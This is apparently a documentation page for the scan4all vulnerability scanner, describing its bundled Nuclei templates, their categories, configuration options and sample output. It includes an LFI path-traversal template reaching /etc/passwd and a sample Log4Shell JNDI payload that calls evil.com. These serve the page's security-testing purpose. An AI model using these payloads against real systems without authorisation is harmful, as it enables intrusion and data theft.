Skip to main content

Overview

scan4all integrates Nuclei templates with 3,922 YAML files across 281 directories, providing extensive vulnerability detection capabilities. The embedded templates are automatically available without additional configuration.

Template Statistics

By Category (Top 10)

CVE Templates

1,430 templates covering known CVE vulnerabilities

Panel Detection

655 templates for exposed admin panels and interfaces

Exploit-DB

563 templates ported from Exploit-DB

LFI Detection

509 templates for local file inclusion vulnerabilities

By Severity

SeverityCountDescription
Info1,474Informational findings, configuration issues
High1,009High-severity vulnerabilities
Medium818Medium-risk security issues
Critical478Critical vulnerabilities requiring immediate action
Low225Low-severity issues
Unknown11Uncategorized findings

By Protocol Type

HTTP

3,858 templates for web application testing

File

76 templates for file-based detection

Network

51 templates for network protocol testing

DNS

17 templates for DNS-based detection

Template Organization

Directory Structure (Top 10)

nuclei-templates/
├── cves/              # 1,407 CVE-specific templates
├── exposed-panels/    # 662 admin panel detection
├── vulnerabilities/   # 509 general vulnerabilities
├── technologies/      # 282 technology detection
├── exposures/         # 275 information disclosure
├── misconfiguration/  # 237 configuration issues
├── token-spray/       # 230 token bruteforce
├── workflows/         # 189 multi-step workflows
├── default-logins/    # 103 default credential checks
└── file/              # 76 file-based checks

Top Contributors

AuthorTemplatesNotable Work
daffainfo631CVE research and panel detection
dhiyaneshdk584Comprehensive vulnerability coverage
pikpikcu329Web application security
pdteam269ProjectDiscovery core templates
geeknik187Fuzzing and edge cases
dwisiswant0169Modern web vulnerabilities
0x_akoko165Information disclosure
princechaddha151Cloud security
ritikchaddha137API security
pussycat0x133WordPress security
Nuclei templates covering known Common Vulnerabilities and Exposures:
  • CVE-2021 Focus: 352 templates for 2021 vulnerabilities
  • Historical CVEs: Coverage from 2010-present
  • Critical RCEs: Log4Shell, Spring4Shell, ProxyShell
  • Auth Bypass: Authentication mechanism vulnerabilities
  • Data Leaks: Information disclosure CVEs
Example: CVE Detection
id: CVE-2021-44228-log4j
info:
  name: Apache Log4j RCE
  severity: critical
  tags: cve,cve2021,rce,log4j
Detection of exposed administrative interfaces:
  • Admin login pages
  • Database management interfaces (phpMyAdmin, Adminer)
  • Monitoring dashboards (Grafana, Kibana)
  • Container management (Docker, Kubernetes)
  • Network devices (routers, switches, firewalls)
Common panels detected:
  • Jenkins
  • GitLab
  • WordPress admin
  • Tomcat Manager
  • Weblogic Console
Comprehensive WordPress security testing:
  • Core vulnerabilities: 419 templates
  • Plugin vulnerabilities: 316 templates
  • Theme vulnerabilities
  • Configuration issues
  • Default installations
Coverage includes:
  • Authentication bypass
  • SQL injection in plugins
  • File upload vulnerabilities
  • XSS in themes
  • XML-RPC abuse
Local file inclusion and directory traversal detection:
  • Classic LFI patterns
  • Path traversal variations
  • Filter bypass techniques
  • Log poisoning vectors
  • Configuration file access
Example: LFI Template
path:
  - "{{BaseURL}}/download?file=../../../../etc/passwd"
  - "{{BaseURL}}/view?page=....//....//etc/passwd"
Cross-site scripting vulnerability templates:
  • Reflected XSS
  • Stored XSS
  • DOM-based XSS
  • Filter bypass techniques
  • Framework-specific XSS

Embedded Templates

scan4all embeds Nuclei templates directly in the binary:
1

Auto-Loading

Templates are automatically loaded at runtime - no external files needed
2

Version Control

Embedded templates ensure consistent scanning across different environments
3

No Updates Required

Templates are bundled with each scan4all release

Configuration

Enable Nuclei Templates

# Enable nuclei template execution
export enableNuclei=true
./scan4all -host target.com

Filter by Severity

# Only run critical and high severity templates
enableNuclei=true ./scan4all -host target.com -severity critical,high

Filter by Tags

# Only run CVE-related templates
enableNuclei=true ./scan4all -host target.com -tags cve,rce

Template Execution Flow

Customization

Custom Nuclei Config

Create config/config.json with Nuclei-specific settings: 
{
  "nuclei": {
    "enabled": true,
    "severity": ["critical", "high", "medium"],
    "tags": [],
    "excludeTags": ["dos"],
    "timeout": 5,
    "retries": 1,
    "rateLimit": 150,
    "bulkSize": 25,
    "templateThreads": 25
  }
}

Template Configuration Options

OptionDescriptionDefault
severityFilter by severity levelall
tagsInclude specific tagsall
excludeTagsExclude specific tagsnone
timeoutTemplate execution timeout (seconds)5
retriesNumber of retries on failure1
rateLimitRequests per second150
bulkSizeConcurrent template execution25

Output Examples

Critical CVE Detection

[CVE-2021-44228][critical] Apache Log4j RCE
  [http] http://target.com/
  [matched] ${jndi:ldap://evil.com/a}
  [timestamp] 2024-03-05T10:30:45Z

Exposed Panel Detection

[exposed-panel][info] Jenkins Dashboard Detected
  [http] http://target.com:8080/
  [matched] Jenkins Dashboard
  [severity] info

Performance Optimization

Rate Limiting

Default: 150 requests/second to prevent overwhelming targets

Bulk Execution

Execute 25 templates concurrently for faster scanning

Request Caching

Cache HTTP responses to avoid duplicate requests

Smart Filtering

Only load templates matching detected technologies

Integration with Other POC Systems

scan4all executes POCs in optimal order:
  1. Go POCs - Fastest, executed first for critical vulns
  2. YAML POCs - xray templates for web apps
  3. Nuclei Templates - Comprehensive coverage last
This layered approach ensures critical vulnerabilities are detected quickly while maintaining comprehensive coverage.

Best Practices

Start with critical/high severity templates to identify serious issues quickly:
enableNuclei=true ./scan4all -host target.com -severity critical,high
Use tags to focus on specific vulnerability types:
enableNuclei=true ./scan4all -host target.com -tags cve2021,rce
Adjust rate limits based on target capacity:
# Slower scan for sensitive targets
enableNuclei=true ./scan4all -host target.com -rate-limit 50
Store results in Elasticsearch for analysis:
enableNuclei=true ./scan4all -host target.com -es-url http://localhost:9200

Troubleshooting

If nuclei templates are not executing, ensure enableNuclei=true is set.

Common Issues

IssueSolution
No resultsVerify enableNuclei=true is set
Slow executionReduce rate limit or bulk size
False positivesUse severity filtering
Missing templatesUpdate scan4all to latest version

Xray POCs

Learn about YAML-based xray POCs

Go POCs

Explore native Go POC modules

Custom POCs

Create your own detection templates

Configuration

Advanced configuration options

Build docs developers (and LLMs) love

Get started for freeTalk to us